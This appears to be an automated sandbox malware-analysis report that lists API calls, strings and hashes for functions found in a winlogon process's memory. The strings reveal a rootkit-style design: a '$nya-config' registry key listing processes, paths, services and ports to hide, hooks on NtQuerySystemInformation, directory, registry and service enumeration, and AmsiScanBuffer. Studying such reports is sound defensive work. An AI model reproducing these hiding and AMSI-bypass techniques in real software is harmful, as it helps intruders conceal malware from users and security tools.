Part of subcall function 000001CA7D2112B8: GetProcessHeap.KERNEL32 ref: 000001CA7D211323
Part of subcall function 000001CA7D2112B8: HeapAlloc.KERNEL32 ref: 000001CA7D211334
Part of subcall function 000001CA7D2112B8: RegEnumValueW.ADVAPI32 ref: 000001CA7D211393
Part of subcall function 000001CA7D2112B8: GetProcessHeap.KERNEL32 ref: 000001CA7D2113DB
Part of subcall function 000001CA7D2112B8: HeapAlloc.KERNEL32 ref: 000001CA7D2113E9
Part of subcall function 000001CA7D2112B8: GetProcessHeap.KERNEL32 ref: 000001CA7D211406
Part of subcall function 000001CA7D2112B8: HeapFree.KERNEL32 ref: 000001CA7D211414
Part of subcall function 000001CA7D2112B8: lstrlenW.KERNEL32 ref: 000001CA7D21141D
Part of subcall function 000001CA7D2112B8: GetProcessHeap.KERNEL32 ref: 000001CA7D21142B
Part of subcall function 000001CA7D2112B8: HeapAlloc.KERNEL32 ref: 000001CA7D211439

Strings

service_names, xrefs: 000001CA7D2118BF
process_names, xrefs: 000001CA7D211849
tcp_remote, xrefs: 000001CA7D211935
SOFTWARE\$nya-config, xrefs: 000001CA7D21178E
startup, xrefs: 000001CA7D2117D1
tcp_local, xrefs: 000001CA7D2118FA
udp, xrefs: 000001CA7D211970
paths, xrefs: 000001CA7D211884
pid, xrefs: 000001CA7D21180E

Memory Dump Source

Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd

Similarity

API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\$nya-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 2135414181-3572789727
Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction ID: 2c83494e5a43262cfe800e831b7ec8651a9dabb613aca94f4580080f8d60cd14
Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction Fuzzy Hash: CD711737B50B1985FB229F21E850AD833A4FF88B8CF819115ED4D47A28DE3AC546C3C6

Function 000001CA7D291E74 Relevance: 43.8, APIs: 8, Strings: 17, Instructions: 95memorythreadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 000001CA7D291E7F

Part of subcall function 000001CA7D2922A8: GetModuleHandleA.KERNEL32(?,?,?,000001CA7D291EB1), ref: 000001CA7D2922C0
Part of subcall function 000001CA7D2922A8: GetProcAddress.KERNEL32(?,?,?,000001CA7D291EB1), ref: 000001CA7D2922D1

CreateThread.KERNEL32 ref: 000001CA7D292043
TlsAlloc.KERNEL32 ref: 000001CA7D292049
TlsAlloc.KERNEL32 ref: 000001CA7D292055
TlsAlloc.KERNEL32 ref: 000001CA7D292061
TlsAlloc.KERNEL32 ref: 000001CA7D29206D
TlsAlloc.KERNEL32 ref: 000001CA7D292079
TlsAlloc.KERNEL32 ref: 000001CA7D292085

Strings

NtEnumerateKey, xrefs: 000001CA7D291F19
PdhGetRawCounterArrayW, xrefs: 000001CA7D291FD0
ntdll.dll, xrefs: 000001CA7D291E8D
EnumServicesStatusExW, xrefs: 000001CA7D291F71, 000001CA7D291F92
NtDeviceIoControlFile, xrefs: 000001CA7D291FB6
NtQueryDirectoryFile, xrefs: 000001CA7D291EDF
pdh.dll, xrefs: 000001CA7D291FD7, 000001CA7D291FF8
NtQuerySystemInformation, xrefs: 000001CA7D291EA5
NtQueryDirectoryFileEx, xrefs: 000001CA7D291EFC
sechost.dll, xrefs: 000001CA7D291F99
advapi32.dll, xrefs: 000001CA7D291F57, 000001CA7D291F78
AmsiScanBuffer, xrefs: 000001CA7D292012
amsi.dll, xrefs: 000001CA7D292019
NtResumeThread, xrefs: 000001CA7D291EC2
NtEnumerateValueKey, xrefs: 000001CA7D291F36
EnumServiceGroupW, xrefs: 000001CA7D291F50
PdhGetFormattedCounterArrayW, xrefs: 000001CA7D291FF1

Memory Dump Source

Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true

Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd

Similarity

API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
API String ID: 1735320900-4225371247
Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction ID: 68f115bde263472201ca07a53b25cff465ad2114566305ba7983a19ab3ffb222
Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction Fuzzy Hash: FA516176E90B4EA5FB039B64E840EE53361FF8434DFC14512980926675AE7AC25BC3E3

Function 000001CA7D211E74 Relevance: 43.8, APIs: 8, Strings: 17, Instructions: 95memorythreadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 000001CA7D211E7F

Part of subcall function 000001CA7D2122A8: GetModuleHandleA.KERNEL32(?,?,?,000001CA7D211EB1), ref: 000001CA7D2122C0
Part of subcall function 000001CA7D2122A8: GetProcAddress.KERNEL32(?,?,?,000001CA7D211EB1), ref: 000001CA7D2122D1

CreateThread.KERNEL32 ref: 000001CA7D212043
TlsAlloc.KERNEL32 ref: 000001CA7D212049
TlsAlloc.KERNEL32 ref: 000001CA7D212055
TlsAlloc.KERNEL32 ref: 000001CA7D212061
TlsAlloc.KERNEL32 ref: 000001CA7D21206D
TlsAlloc.KERNEL32 ref: 000001CA7D212079
TlsAlloc.KERNEL32 ref: 000001CA7D212085

Strings

amsi.dll, xrefs: 000001CA7D212019
NtQuerySystemInformation, xrefs: 000001CA7D211EA5
EnumServicesStatusExW, xrefs: 000001CA7D211F71, 000001CA7D211F92
PdhGetRawCounterArrayW, xrefs: 000001CA7D211FD0
pdh.dll, xrefs: 000001CA7D211FD7, 000001CA7D211FF8
AmsiScanBuffer, xrefs: 000001CA7D212012
NtResumeThread, xrefs: 000001CA7D211EC2
NtEnumerateKey, xrefs: 000001CA7D211F19
EnumServiceGroupW, xrefs: 000001CA7D211F50
ntdll.dll, xrefs: 000001CA7D211E8D
PdhGetFormattedCounterArrayW, xrefs: 000001CA7D211FF1
NtDeviceIoControlFile, xrefs: 000001CA7D211FB6
sechost.dll, xrefs: 000001CA7D211F99
NtEnumerateValueKey, xrefs: 000001CA7D211F36
NtQueryDirectoryFile, xrefs: 000001CA7D211EDF
NtQueryDirectoryFileEx, xrefs: 000001CA7D211EFC
advapi32.dll, xrefs: 000001CA7D211F57, 000001CA7D211F78

Memory Dump Source

Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd

Similarity

API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
API String ID: 1735320900-4225371247
Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction ID: c27b5b2766e8a714269c9b7251a9534395d3fbc0594a058b2d3d4c984f6c3e2e
Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction Fuzzy Hash: 47517A72A90B0EA5FB039B68E842ED83324BF4475CFC18916A40902575DE7BD25BC3E7

Function 000001CA7D2912B8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000001CA7D291315
GetProcessHeap.KERNEL32 ref: 000001CA7D291323
HeapAlloc.KERNEL32 ref: 000001CA7D291334
RegEnumValueW.ADVAPI32 ref: 000001CA7D291393

Part of subcall function 000001CA7D291530: StrCmpIW.SHLWAPI ref: 000001CA7D291561

GetProcessHeap.KERNEL32 ref: 000001CA7D2913DB
HeapAlloc.KERNEL32 ref: 000001CA7D2913E9
GetProcessHeap.KERNEL32 ref: 000001CA7D291406
HeapFree.KERNEL32 ref: 000001CA7D291414
lstrlenW.KERNEL32 ref: 000001CA7D29141D
GetProcessHeap.KERNEL32 ref: 000001CA7D29142B
HeapAlloc.KERNEL32 ref: 000001CA7D291439
StrCpyW.SHLWAPI ref: 000001CA7D29145B
GetProcessHeap.KERNEL32 ref: 000001CA7D291472
HeapFree.KERNEL32 ref: 000001CA7D291480

Strings

d, xrefs: 000001CA7D291356

Memory Dump Source

Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true

Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
Instruction ID: 7a9e4dd526ab2a344e9bcf59a507826a2bcd43945c5cf18051587018948a7a67
Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
Instruction Fuzzy Hash: 34513E33A50B889AE716CF62E4447AB77A1FBC8F99F844124DE4907758DF3DC04A8782

Function 000001CA7D2112B8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000001CA7D211315
GetProcessHeap.KERNEL32 ref: 000001CA7D211323
HeapAlloc.KERNEL32 ref: 000001CA7D211334
RegEnumValueW.ADVAPI32 ref: 000001CA7D211393

Part of subcall function 000001CA7D211530: StrCmpIW.SHLWAPI ref: 000001CA7D211561

GetProcessHeap.KERNEL32 ref: 000001CA7D2113DB
HeapAlloc.KERNEL32 ref: 000001CA7D2113E9
GetProcessHeap.KERNEL32 ref: 000001CA7D211406
HeapFree.KERNEL32 ref: 000001CA7D211414
lstrlenW.KERNEL32 ref: 000001CA7D21141D
GetProcessHeap.KERNEL32 ref: 000001CA7D21142B
HeapAlloc.KERNEL32 ref: 000001CA7D211439
StrCpyW.SHLWAPI ref: 000001CA7D21145B
GetProcessHeap.KERNEL32 ref: 000001CA7D211472
HeapFree.KERNEL32 ref: 000001CA7D211480

Strings

d, xrefs: 000001CA7D211356

Memory Dump Source

Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
Instruction ID: 10435c65013aa49502dc7abc10a9fb8f475a20879a614cbceb8abb604b999947
Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
Instruction Fuzzy Hash: E5516033A50B8896F722CF62E44979A77A1FB88F98F858124DE4907718DF3DD046C782

Function 000001CA7D1E12B8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000001CA7D1E1315
GetProcessHeap.KERNEL32 ref: 000001CA7D1E1323
HeapAlloc.KERNEL32 ref: 000001CA7D1E1334
RegEnumValueW.ADVAPI32 ref: 000001CA7D1E1393

Part of subcall function 000001CA7D1E1530: StrCmpIW.SHLWAPI ref: 000001CA7D1E1561

GetProcessHeap.KERNEL32 ref: 000001CA7D1E13DB
HeapAlloc.KERNEL32 ref: 000001CA7D1E13E9
GetProcessHeap.KERNEL32 ref: 000001CA7D1E1406
HeapFree.KERNEL32 ref: 000001CA7D1E1414
lstrlenW.KERNEL32 ref: 000001CA7D1E141D
GetProcessHeap.KERNEL32 ref: 000001CA7D1E142B
HeapAlloc.KERNEL32 ref: 000001CA7D1E1439
StrCpyW.SHLWAPI ref: 000001CA7D1E145B
GetProcessHeap.KERNEL32 ref: 000001CA7D1E1472
HeapFree.KERNEL32 ref: 000001CA7D1E1480

Strings

d, xrefs: 000001CA7D1E1356

Memory Dump Source

Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true

Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
Instruction ID: c1dc221c099710ed114a4203ff786129722ca6648603eb70c6731709578373a2
Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
Instruction Fuzzy Hash: 7151C073A45B8886F721CF62E41879A77A1FB88F89F844124DE4A03758DF3DC145C782

Function 000001CA7D29EF88 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 140librarymemoryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,00000100,00000000,000001CA7D29F34A,?,?,00000000,000001CA7D29F2CD), ref: 000001CA7D29EFF5
GetLastError.KERNEL32(?,?,00000000,000001CA7D29F2CD), ref: 000001CA7D29F007
LoadLibraryExW.KERNEL32(?,?,00000000,000001CA7D29F2CD), ref: 000001CA7D29F049
VirtualProtect.KERNEL32 ref: 000001CA7D29F0A5
VirtualProtect.KERNEL32 ref: 000001CA7D29F0D6
FreeLibrary.KERNEL32(?,?,00000000,000001CA7D29F2CD), ref: 000001CA7D29F11A
GetProcAddress.KERNEL32(?,?,00000000,000001CA7D29F2CD), ref: 000001CA7D29F126

Strings

api-ms-, xrefs: 000001CA7D29F01B
ext-ms-, xrefs: 000001CA7D29F02E
AppPolicyGetProcessTerminationMethod, xrefs: 000001CA7D29F157, 000001CA7D29F165

Memory Dump Source

Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true

Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd

Similarity

API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
API String ID: 740688525-1880043860
Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
Instruction ID: 35e59fce39fc26d4e588c545ceda4915201235a0509f46c42b5d2ee77a2c5ca4
Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
Instruction Fuzzy Hash: 97519C33B4171851FA569B56A800BE632A0BF88BB9F9807259E39173D4DF3AD40686C3

Function 000001CA7D21EF88 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 140librarymemoryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,00000100,00000000,000001CA7D21F34A,?,?,00000000,000001CA7D21F2CD), ref: 000001CA7D21EFF5
GetLastError.KERNEL32(?,?,00000000,000001CA7D21F2CD), ref: 000001CA7D21F007
LoadLibraryExW.KERNEL32(?,?,00000000,000001CA7D21F2CD), ref: 000001CA7D21F049
VirtualProtect.KERNEL32 ref: 000001CA7D21F0A5
VirtualProtect.KERNEL32 ref: 000001CA7D21F0D6
FreeLibrary.KERNEL32(?,?,00000000,000001CA7D21F2CD), ref: 000001CA7D21F11A
GetProcAddress.KERNEL32(?,?,00000000,000001CA7D21F2CD), ref: 000001CA7D21F126

Strings

ext-ms-, xrefs: 000001CA7D21F02E
AppPolicyGetProcessTerminationMethod, xrefs: 000001CA7D21F157, 000001CA7D21F165
api-ms-, xrefs: 000001CA7D21F01B

Memory Dump Source

Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd

Similarity

API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
API String ID: 740688525-1880043860
Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
Instruction ID: 841100cd2b18d10c7530346504741f059c760433718e5c958d51dca8c66ea59f
Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
Instruction Fuzzy Hash: 79518F33B4170851FA169B56A800BE57250BF48BB8FD88729AE3D073D4DF3AD54686C7

Function 000001CA7D2933A8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

PdhGetCounterInfoW.PDH ref: 000001CA7D2933FD
GetProcessHeap.KERNEL32 ref: 000001CA7D293412
HeapAlloc.KERNEL32 ref: 000001CA7D293420
PdhGetCounterInfoW.PDH ref: 000001CA7D293436
StrCmpW.SHLWAPI ref: 000001CA7D29344B

Part of subcall function 000001CA7D293950: StrCmpNW.SHLWAPI ref: 000001CA7D293972
Part of subcall function 000001CA7D293950: StrStrW.SHLWAPI ref: 000001CA7D293990
Part of subcall function 000001CA7D293950: StrToIntW.SHLWAPI ref: 000001CA7D2939B7

GetProcessHeap.KERNEL32 ref: 000001CA7D293488
HeapFree.KERNEL32 ref: 000001CA7D293496

Strings

\GPU Engine(*)\Running Time, xrefs: 000001CA7D293444

Memory Dump Source

Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true

Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd

Similarity

API ID: Heap$CounterInfoProcess$AllocFree
String ID: \GPU Engine(*)\Running Time
API String ID: 1943346504-1805530042
Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
Instruction ID: 43c5e0d34ebc6dccf3a439a469952983112bd81c68c9bea665965f379fc87005
Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
Instruction Fuzzy Hash: A431A033E44B4896F722CF12E804B9AB3A0FBC8B9AF8505259E4957624DF39C45787C2

Function 000001CA7D2133A8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

PdhGetCounterInfoW.PDH ref: 000001CA7D2133FD
GetProcessHeap.KERNEL32 ref: 000001CA7D213412
HeapAlloc.KERNEL32 ref: 000001CA7D213420
PdhGetCounterInfoW.PDH ref: 000001CA7D213436
StrCmpW.SHLWAPI ref: 000001CA7D21344B

Part of subcall function 000001CA7D213950: StrCmpNW.SHLWAPI ref: 000001CA7D213972
Part of subcall function 000001CA7D213950: StrStrW.SHLWAPI ref: 000001CA7D213990
Part of subcall function 000001CA7D213950: StrToIntW.SHLWAPI ref: 000001CA7D2139B7

GetProcessHeap.KERNEL32 ref: 000001CA7D213488
HeapFree.KERNEL32 ref: 000001CA7D213496

Strings

\GPU Engine(*)\Running Time, xrefs: 000001CA7D213444

Memory Dump Source

Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd

Similarity

API ID: Heap$CounterInfoProcess$AllocFree
String ID: \GPU Engine(*)\Running Time
API String ID: 1943346504-1805530042
Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
Instruction ID: 752b222f9f1cd9264d68c2c53bbe3c21249311e990f53d32d649b7497d1e9cf2
Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
Instruction Fuzzy Hash: 1A31E933E44B5896F722CF12A404B99B391FB88B98FC48528AD4843624DF3AD44383C6

Function 000001CA7D1E33A8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

PdhGetCounterInfoW.PDH ref: 000001CA7D1E33FD
GetProcessHeap.KERNEL32 ref: 000001CA7D1E3412
HeapAlloc.KERNEL32 ref: 000001CA7D1E3420
PdhGetCounterInfoW.PDH ref: 000001CA7D1E3436
StrCmpW.SHLWAPI ref: 000001CA7D1E344B

Part of subcall function 000001CA7D1E3950: StrCmpNW.SHLWAPI ref: 000001CA7D1E3972
Part of subcall function 000001CA7D1E3950: StrStrW.SHLWAPI ref: 000001CA7D1E3990
Part of subcall function 000001CA7D1E3950: StrToIntW.SHLWAPI ref: 000001CA7D1E39B7

GetProcessHeap.KERNEL32 ref: 000001CA7D1E3488
HeapFree.KERNEL32 ref: 000001CA7D1E3496

Strings

\GPU Engine(*)\Running Time, xrefs: 000001CA7D1E3444

Memory Dump Source

Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true

Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd

Similarity

API ID: Heap$CounterInfoProcess$AllocFree
String ID: \GPU Engine(*)\Running Time
API String ID: 1943346504-1805530042
Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
Instruction ID: 5256ce4443abd153758bcd99e98d7bf0abd56920327f9ba419e77a24a63d0f90
Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
Instruction Fuzzy Hash: C231C433E40B4996F722CF12E804B99B3A0FB88FCAF840614AE4943665DF39C555C382

Function 000001CA7D2934B8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73memoryCOMMON

Download Yara Rule

APIs

PdhGetCounterInfoW.PDH ref: 000001CA7D293516
GetProcessHeap.KERNEL32 ref: 000001CA7D293527
HeapAlloc.KERNEL32 ref: 000001CA7D293535
PdhGetCounterInfoW.PDH ref: 000001CA7D29354B
StrCmpW.SHLWAPI ref: 000001CA7D293560

Part of subcall function 000001CA7D293950: StrCmpNW.SHLWAPI ref: 000001CA7D293972
Part of subcall function 000001CA7D293950: StrStrW.SHLWAPI ref: 000001CA7D293990
Part of subcall function 000001CA7D293950: StrToIntW.SHLWAPI ref: 000001CA7D2939B7

GetProcessHeap.KERNEL32 ref: 000001CA7D29358D
HeapFree.KERNEL32 ref: 000001CA7D29359B

Strings

\GPU Engine(*)\Utilization Percentage, xrefs: 000001CA7D293559

Memory Dump Source

Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true

Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
